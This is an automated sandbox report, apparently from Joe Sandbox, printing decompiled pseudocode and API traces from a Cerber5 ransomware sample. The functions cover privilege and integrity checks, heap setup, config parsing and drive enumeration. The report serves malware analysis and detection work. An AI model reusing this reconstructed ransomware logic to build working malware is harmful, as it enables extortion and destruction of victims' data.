                                                                                                                                                                                        • StrCmpNW.SHLWAPI(?,00000000,?,?,00000004), ref: 0040A1AB
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: DeviceDriveQueryType
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1681518211-0
                                                                                                                                                                                        • Opcode ID: 4b148df9ae91c5ba2482056e9ee7b3809aa57e2fd434fc04b6390f61eb416309
                                                                                                                                                                                        • Instruction ID: b50e7e1ea01d827a664b47746907d113240531ed754b66fccc48f788dd9396a9
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b148df9ae91c5ba2482056e9ee7b3809aa57e2fd434fc04b6390f61eb416309
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0CF0F072E00228A6DB303A648C09E9B762C9B00B54F040532FE14FA2D0E6748DA885CD
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 56%
                                                                                                                                                                                        			E00402DDE() {
                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                        				void* __ecx;
                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t14 = 0;
                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                        				if(OpenProcessToken(GetCurrentProcess(), 0xa,  &_v8) == 0) {
                                                                                                                                                                                        					L8:
                                                                                                                                                                                        					return _t14;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_push(_v8);
                                                                                                                                                                                        				if( *0x43072c < 6) {
                                                                                                                                                                                        					_t10 = E00402D06();
                                                                                                                                                                                        					L5:
                                                                                                                                                                                        					if(_t10 != 0) {
                                                                                                                                                                                        						_t14 = 1;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L7:
                                                                                                                                                                                        					CloseHandle(_v8);
                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t12 = E00402D06(); // executed
                                                                                                                                                                                        				_pop(_t18);
                                                                                                                                                                                        				if(_t12 == 0) {
                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t10 = E00402DB2(_t18, _v8); // executed
                                                                                                                                                                                        				goto L5;
                                                                                                                                                                                        			}










                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,0040811E,00000000,?,?,?,?,004065A6,00000000), ref: 00402DEE
                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,0040811E,00000000,?,?,?,?,004065A6,00000000), ref: 00402DF5
                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,0040811E,00000000,?,?,?,?,004065A6,00000000), ref: 00402E2E
                                                                                                                                                                                          • Part of subcall function 00402D06: GetTokenInformation.KERNELBASE(?,00000012(TokenIntegrityLevel),?,00000004,?,00000000), ref: 00402D30
                                                                                                                                                                                          • Part of subcall function 00402D06: GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),?,00000004,?), ref: 00402D4F
                                                                                                                                                                                          • Part of subcall function 00402D06: DuplicateToken.ADVAPI32(?,00000001,?,00000000), ref: 00402D67
                                                                                                                                                                                          • Part of subcall function 00402D06: CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 00402D83
                                                                                                                                                                                          • Part of subcall function 00402D06: CheckTokenMembership.ADVAPI32(?,?,?), ref: 00402D98
                                                                                                                                                                                          • Part of subcall function 00402D06: FindCloseChangeNotification.KERNEL32(?), ref: 00402DA1
                                                                                                                                                                                          • Part of subcall function 00402DB2: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,00000000,?,?,?,00402E1D,?,?,?,?,0040811E,00000000), ref: 00402DC9
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Token$Information$CloseProcess$ChangeCheckCreateCurrentDuplicateFindHandleKnownMembershipNotificationOpenWell
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1240585583-0
                                                                                                                                                                                        • Opcode ID: 248482eb807f76892f9d049e9d38bd24e7e029077d2cc3bc76471740b8d43eb3
                                                                                                                                                                                        • Instruction ID: e8ce22f645738a416db643b232aefe13eabb038650c169b39ca4f9c89f3ecb12
                                                                                                                                                                                        • Opcode Fuzzy Hash: 248482eb807f76892f9d049e9d38bd24e7e029077d2cc3bc76471740b8d43eb3
                                                                                                                                                                                        • Instruction Fuzzy Hash: 07F08935540205EFCF25AFA1DF5D69E7729EF01348710407FE502766E1C7B68D089A59
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                        			E004052DB(void* __ecx) {
                                                                                                                                                                                        				char _v8;
                                                                                                                                                                                        				void* _t4;
                                                                                                                                                                                        				long _t6;
                                                                                                                                                                                        
                                                                                                                                                                                        				if(E0040521D() == 0) {
                                                                                                                                                                                        					L2:
                                                                                                                                                                                        					_t4 = HeapCreate(0, 0, 0); // executed
                                                                                                                                                                                        					 *0x42f808 = _t4;
                                                                                                                                                                                        					if(_t4 != 0) {
                                                                                                                                                                                        						_v8 = 2;
                                                                                                                                                                                        						 *0x40f25c(_t4, 0,  &_v8, 4);
                                                                                                                                                                                        						_t6 = GetCurrentProcessId();
                                                                                                                                                                                        						 *0x42f80c = _t6;
                                                                                                                                                                                        						return _t6;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_t4 = E0040528D();
                                                                                                                                                                                        					if(_t4 == 0) {
                                                                                                                                                                                        						goto L2;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t4;
                                                                                                                                                                                        			}







                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 0040521D: GetCurrentProcessId.KERNEL32(0040534D,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?,?,00000000), ref: 0040521D
                                                                                                                                                                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000), ref: 004052F7
                                                                                                                                                                                        • HeapSetInformation.KERNEL32(00000000,00000000,00000000,00000004,?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000), ref: 00405316
                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?), ref: 0040531C
                                                                                                                                                                                          • Part of subcall function 0040528D: GetProcessHeaps.KERNEL32(000000FF,?,?,00000000), ref: 004052AC
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Process$CurrentHeap$CreateHeapsInformation
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3179415709-0
                                                                                                                                                                                        • Opcode ID: f4d2fe047154c820b9d04e58fef47c53acbd2844d057b6373e8296822e6be4ef
                                                                                                                                                                                        • Instruction ID: 23e59799b477871dd03203e7d772dc5f3eff58e84d09700a679526b41974071e
                                                                                                                                                                                        • Opcode Fuzzy Hash: f4d2fe047154c820b9d04e58fef47c53acbd2844d057b6373e8296822e6be4ef
                                                                                                                                                                                        • Instruction Fuzzy Hash: BEE0E574140704AADB20AF61ED06B5777A4EB05745F9040BDFA01B62E1DBB595088E6D
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                        			E00405463(void* __esi) {
                                                                                                                                                                                        				void* _t5;
                                                                                                                                                                                        				long _t6;
                                                                                                                                                                                        				char _t7;
                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                        				long _t14;
                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t16 = __esi;
                                                                                                                                                                                        				_t5 = E0040521D();
                                                                                                                                                                                        				_t17 = _t5;
                                                                                                                                                                                        				if(_t5 != 0) {
                                                                                                                                                                                        					_t6 = GetLastError();
                                                                                                                                                                                        					_push(__esi);
                                                                                                                                                                                        					_t14 = _t6;
                                                                                                                                                                                        					_t7 = E0040522F(_t9, __esi, _t17);
                                                                                                                                                                                        					if(_t7 != 0) {
                                                                                                                                                                                        						_t1 = _t16 - 8; // -8
                                                                                                                                                                                        						_t8 = _t1;
                                                                                                                                                                                        						 *((intOrPtr*)(_t8 + 4)) = 0xdeadbeef;
                                                                                                                                                                                        						 *((intOrPtr*)( *_t8 + _t8 + 8)) = 0xdeadbeef;
                                                                                                                                                                                        						_t7 = RtlFreeHeap( *0x42f808, 0, _t8); // executed
                                                                                                                                                                                        					}
                                                                                                                                                                                        					SetLastError(_t14);
                                                                                                                                                                                        					return _t7;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t5;
                                                                                                                                                                                        			}











                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 0040521D: GetCurrentProcessId.KERNEL32(0040534D,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?,?,00000000), ref: 0040521D
                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
                                                                                                                                                                                          • Part of subcall function 0040522F: HeapValidate.KERNEL32(00000000,?,0040D988,0000000C,0040547B,00000000), ref: 00405252
                                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000000,-00000008), ref: 0040549A
                                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 004054A1
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ErrorHeapLast$CurrentFreeProcessValidate
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1604491510-0
                                                                                                                                                                                        • Opcode ID: dbc678ea5d9c0626ecbb90ad8326887dd0f71650410c463631faa0dbcd0d6e46
                                                                                                                                                                                        • Instruction ID: 88a8954fb70d2862f9babb8fa3ca0a82616e00d93f94b9d4758e7abe23009c6a
                                                                                                                                                                                        • Opcode Fuzzy Hash: dbc678ea5d9c0626ecbb90ad8326887dd0f71650410c463631faa0dbcd0d6e46
                                                                                                                                                                                        • Instruction Fuzzy Hash: D8E092350002019BC720AF54E908A6B77A9EF89325B4480BEF401E73A1CB39848A8E1C
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                        			E00403988(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                        				int _t32;
                                                                                                                                                                                        				char _t35;
                                                                                                                                                                                        				char* _t37;
                                                                                                                                                                                        				int _t40;
                                                                                                                                                                                        				int _t45;
                                                                                                                                                                                        				intOrPtr _t47;
                                                                                                                                                                                        				intOrPtr _t48;
                                                                                                                                                                                        				int _t53;
                                                                                                                                                                                        				intOrPtr _t54;
                                                                                                                                                                                        				intOrPtr _t55;
                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                        				char* _t60;
                                                                                                                                                                                        
                                                                                                                                                                                        				_push(0xeed5962f);
                                                                                                                                                                                        				_t53 = 4;
                                                                                                                                                                                        				_push(_t53);
                                                                                                                                                                                        				_push(0x40d2b8);
                                                                                                                                                                                        				_t60 = E004033A7(_a8, _a12, E00405905());
                                                                                                                                                                                        				if(_t60 != 0) {
                                                                                                                                                                                        					_t30 = StrCmpNIA(_t60, E00405905(0x40d2b0, _t53, 0xe53c37de), _t53);
                                                                                                                                                                                        					_t69 = _t30;
                                                                                                                                                                                        					if(_t30 != 0) {
                                                                                                                                                                                        						_t45 = 5;
                                                                                                                                                                                        						_t32 = StrCmpNIA(_t60, E00405905(0x40d2a0, _t45, 0xf9b19ebb), _t45);
                                                                                                                                                                                        						__eflags = _t32;
                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                        							__eflags = StrCmpNIA(_t60, E00405905(0x40d298, _t53, 0xc25ee221), _t53);
                                                                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                                                                        								_t35 =  *_t60;
                                                                                                                                                                                        								__eflags = _t35 - 0x22;
                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                        									__eflags = _t35 - 0x2d;
                                                                                                                                                                                        									if(__eflags == 0) {
                                                                                                                                                                                        										L18:
                                                                                                                                                                                        										_t54 = _a4;
                                                                                                                                                                                        										_t37 = E0040340D(_a12, __eflags, _t54, _t60);
                                                                                                                                                                                        										 *((intOrPtr*)(_t54 + 0x14)) = 2;
                                                                                                                                                                                        										goto L19;
                                                                                                                                                                                        									} else {
                                                                                                                                                                                        										__eflags = _t35 - 0x30;
                                                                                                                                                                                        										if(_t35 < 0x30) {
                                                                                                                                                                                        											L13:
                                                                                                                                                                                        											__eflags = _t35 - 0x5b;
                                                                                                                                                                                        											if(__eflags != 0) {
                                                                                                                                                                                        												__eflags = _t35 - 0x7b;
                                                                                                                                                                                        												if(__eflags == 0) {
                                                                                                                                                                                        													_t55 = _a4;
                                                                                                                                                                                        													_t37 = E0040383F(_a12, __eflags, _t55, _t60); // executed
                                                                                                                                                                                        													 *(_t55 + 0x14) = _t45;
                                                                                                                                                                                        													goto L19;
                                                                                                                                                                                        												} else {
                                                                                                                                                                                        													_t60 = 0;
                                                                                                                                                                                        												}
                                                                                                                                                                                        											} else {
                                                                                                                                                                                        												_t47 = _a4;
                                                                                                                                                                                        												_t37 = E00403765(_a12, __eflags, _t47, _t60);
                                                                                                                                                                                        												 *(_t47 + 0x14) = _t53;
                                                                                                                                                                                        												L19:
                                                                                                                                                                                        												goto L20;
                                                                                                                                                                                        											}
                                                                                                                                                                                        										} else {
                                                                                                                                                                                        											__eflags = _t35 - 0x39;
                                                                                                                                                                                        											if(__eflags <= 0) {
                                                                                                                                                                                        												goto L18;
                                                                                                                                                                                        											} else {
                                                                                                                                                                                        												goto L13;
                                                                                                                                                                                        											}
                                                                                                                                                                                        										}
                                                                                                                                                                                        									}
                                                                                                                                                                                        								} else {
                                                                                                                                                                                        									_t56 = _a4;
                                                                                                                                                                                        									_t37 = E004034CB(__eflags, _t56, _t60, _a12); // executed
                                                                                                                                                                                        									 *((intOrPtr*)(_t56 + 0x14)) = 3;
                                                                                                                                                                                        									goto L20;
                                                                                                                                                                                        								}
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								_t48 = _a4;
                                                                                                                                                                                        								 *(_t48 + 0x20) = 1;
                                                                                                                                                                                        								_t40 = _t53;
                                                                                                                                                                                        								goto L5;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							_t48 = _a4;
                                                                                                                                                                                        							 *(_t48 + 0x20) = _t32;
                                                                                                                                                                                        							_t40 = 5;
                                                                                                                                                                                        							L5:
                                                                                                                                                                                        							_t37 = E004033CD(_t40, _t60, _a12, __eflags);
                                                                                                                                                                                        							 *(_t48 + 0x14) =  *(_t48 + 0x14) & 0x00000000;
                                                                                                                                                                                        							L20:
                                                                                                                                                                                        							_t60 = _t37;
                                                                                                                                                                                        						}
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						_t60 = E004033CD(_t53, _t60, _a12, _t69);
                                                                                                                                                                                        						 *((intOrPtr*)(_a4 + 0x14)) = 1;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t60;
                                                                                                                                                                                        			}



















                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 004033A7: StrSpnA.SHLWAPI(?,?,00000004,004039AC,00000000,0040D2B8,00000004,EED5962F,?,00000000,?,00403AF6,00000000,?,?,00000000), ref: 004033AF
                                                                                                                                                                                        • StrCmpNIA.SHLWAPI(00000000,00000000,?,?,00000004,?,?,?,?,?,00000000,000000C8), ref: 004039CF
                                                                                                                                                                                        • StrCmpNIA.SHLWAPI(00000000,00000000,?,00000005,?,?,?,00000004,?,?,?,?,?,00000000,000000C8), ref: 00403A10
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: f2629cd729c0c5cb705942234141dadd55e154167e403ab8f8840aa9260b1430
                                                                                                                                                                                        • Instruction ID: bc9afb23272d53494b0115821da1e55680acf016d7d4a51e959fbc0468c80e88
                                                                                                                                                                                        • Opcode Fuzzy Hash: f2629cd729c0c5cb705942234141dadd55e154167e403ab8f8840aa9260b1430
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B310571700204ABCB209E559C45EAB3F6CEB46765F15003BFC85B7381D378EA428BAE
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                                        			E0040ABCC(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                        				void* _v52;
                                                                                                                                                                                        				struct _MEMORYSTATUSEX _v80;
                                                                                                                                                                                        				intOrPtr _v152;
                                                                                                                                                                                        				char _v160;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                        				void* _t31;
                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t30 = __edx;
                                                                                                                                                                                        				 *0x42fa68 = 0;
                                                                                                                                                                                        				 *0x42fa6c = 0; // executed
                                                                                                                                                                                        				_t12 = E0040A0A4(); // executed
                                                                                                                                                                                        				_t31 = _t12;
                                                                                                                                                                                        				_t32 = 0;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t14 = E0040A892(_t31,  &_v16); // executed
                                                                                                                                                                                        					if(_t14 >= 2 && (_t14 <= 3 || _t14 == 6)) {
                                                                                                                                                                                        						_t23 = E0040AAFB(0, _t30, _t32, _a4,  &_v16); // executed
                                                                                                                                                                                        						 *0x42fa68 =  *0x42fa68 + _t23;
                                                                                                                                                                                        						asm("adc [0x42fa6c], edx");
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t32 = _t32 + 1;
                                                                                                                                                                                        				} while (_t32 <= 0x19);
                                                                                                                                                                                        				_v80.dwLength = 0x40;
                                                                                                                                                                                        				GlobalMemoryStatusEx( &_v80); // executed
                                                                                                                                                                                        				 *0x42fa68 =  *0x42fa68 - _v80.ullTotalVirtual;
                                                                                                                                                                                        				asm("sbb [0x42fa6c], eax");
                                                                                                                                                                                        				_t19 =  *0x40e8d8(4, 0, 0,  &_v160, 0x4c); // executed
                                                                                                                                                                                        				if(_t19 >= 0 && _v152 != 0) {
                                                                                                                                                                                        					 *0x42fa68 =  *0x42fa68 - _v80.ullTotalPhys;
                                                                                                                                                                                        					asm("sbb [0x42fa6c], eax");
                                                                                                                                                                                        					return _v80.ullAvailPhys;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t19;
                                                                                                                                                                                        			}


















                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 0040A0A4: GetLogicalDrives.KERNEL32 ref: 0040A0AD
                                                                                                                                                                                          • Part of subcall function 0040A0A4: RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000), ref: 0040A0ED
                                                                                                                                                                                          • Part of subcall function 0040A0A4: RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040A123
                                                                                                                                                                                          • Part of subcall function 0040A0A4: RegCloseKey.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040A138
                                                                                                                                                                                          • Part of subcall function 0040A892: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040A8D4
                                                                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?,00000000,00000000,00000000), ref: 0040AC37
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CloseDrivesGlobalLogicalMemoryOpenQueryStatusValuelstrcpy
                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                        • API String ID: 131812180-2766056989
                                                                                                                                                                                        • Opcode ID: 8b14cefcd5f0184461d019f75121066f0c47cdd9a79100fc96c2c492249fe9ef
                                                                                                                                                                                        • Instruction ID: dff415d2ceaf4e522acc9e0bd46ad76a6cd1046b5fef115d2c623fad209be056
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b14cefcd5f0184461d019f75121066f0c47cdd9a79100fc96c2c492249fe9ef
                                                                                                                                                                                        • Instruction Fuzzy Hash: 88111272A042189FFB20DBA9ED81A9D77F8EB04714F90407BE504E2191E6349A5ACF5A
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 70%
                                                                                                                                                                                        			E00406598(char __eax, void* __ecx, void* __edx, void* __esi, void* __eflags) {
                                                                                                                                                                                        				char _v8;
                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                        				char _t16;
                                                                                                                                                                                        				char _t24;
                                                                                                                                                                                        				void* _t37;
                                                                                                                                                                                        				void* _t42;
                                                                                                                                                                                        				char _t48;
                                                                                                                                                                                        				void* _t50;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t50 = __esi;
                                                                                                                                                                                        				_t46 = __edx;
                                                                                                                                                                                        				_t40 = __ecx;
                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                        				_t48 = __eax; // executed
                                                                                                                                                                                        				_t10 = E0040810D(__edx, __eax, __eflags); // executed
                                                                                                                                                                                        				_t37 = _t10;
                                                                                                                                                                                        				if( *0x43072c >= 0xa) {
                                                                                                                                                                                        					Sleep(0x2710); // executed
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(_t37 != 0) {
                                                                                                                                                                                        					E0040767A(_t46, _t48, 1);
                                                                                                                                                                                        					E004026BF(_t37);
                                                                                                                                                                                        					_push(_t48);
                                                                                                                                                                                        					__eflags = E00409C8E(_t40, _t46, __eflags);
                                                                                                                                                                                        					if(__eflags != 0) {
                                                                                                                                                                                        						_t16 = E0040A8DF(_t40, _t46, __eflags, _t48,  &_v8,  &_v12); // executed
                                                                                                                                                                                        						__eflags = _t16;
                                                                                                                                                                                        						if(_t16 != 0) {
                                                                                                                                                                                        							_t38 = _t48;
                                                                                                                                                                                        							E00402438(_t48, _t46, _v8);
                                                                                                                                                                                        							E0040A6AC(_v12);
                                                                                                                                                                                        							E004083D7(_t48, _t46, _t48, _t50, __eflags);
                                                                                                                                                                                        							__eflags =  *0x42f79f;
                                                                                                                                                                                        							_t42 = _t48;
                                                                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                                                                        								_t24 = E0040AA30(_t38, _t42, _t46, __eflags, _t48,  &_v12,  &_v8);
                                                                                                                                                                                        								__eflags = _t24;
                                                                                                                                                                                        								if(_t24 != 0) {
                                                                                                                                                                                        									E00402438(_t38, _t46, _v12);
                                                                                                                                                                                        									E0040A6AC(_v8);
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							_push(E00405905(0x40d3d0, 0x19, 0x41e9377d));
                                                                                                                                                                                        							_push(_t48);
                                                                                                                                                                                        							E00402B21(_t37, _t46, _t48, _t50);
                                                                                                                                                                                        							E0040767A(_t46, _t48, 0);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						_push(E00405905(0x40d3b4, 0x18, 0x5f6f2f69));
                                                                                                                                                                                        						_push(_t48);
                                                                                                                                                                                        						E00402B21(_t37, _t46, _t48, _t50);
                                                                                                                                                                                        					}
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_push(E00408107());
                                                                                                                                                                                        					_push(E00405905(0x40d3a4, 0xf, 0x7b772ff7));
                                                                                                                                                                                        					_push(_t48);
                                                                                                                                                                                        					E00402B21(_t37, _t46, _t48, _t50);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return SetEvent( *0x42f834);
                                                                                                                                                                                        			}

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • Sleep.KERNEL32(00002710,00000000,?,?,?,?,0040684C), ref: 004065B6
                                                                                                                                                                                          • Part of subcall function 00409C8E: RtlInitializeCriticalSection.NTDLL(0042FAD4), ref: 00409C9A
                                                                                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,00000000,000000C8), ref: 004066B1
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CriticalEventInitializeSectionSleep
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1594292029-0
                                                                                                                                                                                        • Opcode ID: 39012ffd0e3606cec16687bb55fc47e4506806c2c1cc8f1209055042ebba4129
                                                                                                                                                                                        • Instruction ID: 818db32ef9ad872f8d9c7ac3a9d740fdf4ec65af7803892208c62983cd778a81
